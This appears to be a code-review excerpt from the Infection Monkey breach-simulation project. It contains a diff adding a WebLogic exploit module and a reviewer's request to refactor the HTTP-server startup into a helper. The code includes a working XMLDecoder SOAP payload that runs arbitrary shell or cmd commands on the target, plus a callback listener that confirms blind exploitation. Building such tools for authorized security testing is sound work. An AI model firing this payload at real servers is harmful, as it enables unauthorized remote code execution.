infection_monkey/exploit/weblogic.py

```diff
@@ -0,0 +1,174 @@
+                    <void index="0">
+                      <string>{cmd_base}</string>
+                    </void>
+                    <void index="1">
+                      <string>{cmd_opt}</string>
+                    </void>
+                    <void index="2">
+                      <string>{cmd_payload}</string>
+                    </void>
+                  </array>
+                  <void method="start"/>
+                </object>
+              </java>
+            </work:WorkContext>
+          </soapenv:Header>
+          <soapenv:Body/>
+        </soapenv:Envelope>
+        '''
+        if 'linux' in self.host.os['type']:
+            cmd_base = '/bin/sh'
+            cmd_opt = '-c'
+            command += ' 1> /dev/null 2> /dev/null'
+        else:
+            cmd_base = 'cmd'
+            cmd_opt = '/c'
+            command += ' 1> NUL 2> NUL'
+
+        payload = empty_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt, cmd_payload=command)
+        try:
+            post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT, verify=False)
+        except Exception as e:
+            print('[!] Connection Error')
+            print(e)
+        return True
+
+    class HTTPServer(threading.Thread):
+        """
+        Http server built to wait for GET requests. Because oracle web logic vuln is blind,
+        we determine if we can exploit by either getting a GET request from host or not.
+        """
+        def __init__(self, local_ip, local_port, lock, max_requests=1):
+            self._local_ip = local_ip
+            self._local_port = local_port
+            self.get_requests = 0
+            self.max_requests = max_requests
+            self._stopped = False
+            self.lock = lock
+            threading.Thread.__init__(self)
+
+        def run(self):
+            class S(BaseHTTPRequestHandler):
+                @staticmethod
+                def do_GET():
+                    LOG.info('Server received a request from vulnerable machine')
+                    self.get_requests += 1
+            LOG.info('Server waiting for exploited machine request...')
+            httpd = HTTPServer((self._local_ip, self._local_port), S)
+            httpd.daemon = True
+            self.lock.release()
+            while not self._stopped and self.get_requests < self.max_requests:
+                httpd.handle_request()
+
+            self._stopped = True
+            return httpd
+
+        def stop(self):
+            self._stopped = True
+            return
+
+    def check_if_exploitable(self, url):
+        # Server might get response faster than it starts listening to it, we need a lock
+        lock = threading.Lock()
+        local_port = get_free_tcp_port()
+        local_ip = get_interface_to_target(self.host.ip_addr)
+        httpd = WebLogicExploiter.HTTPServer(local_ip, local_port, lock)
+        httpd.daemon = True
+        lock.acquire()
+        httpd.start()
+        lock.acquire()
```

Comment:
Export to function the part from 'local_port = ...' up to this line. You can name it _start_http_server or something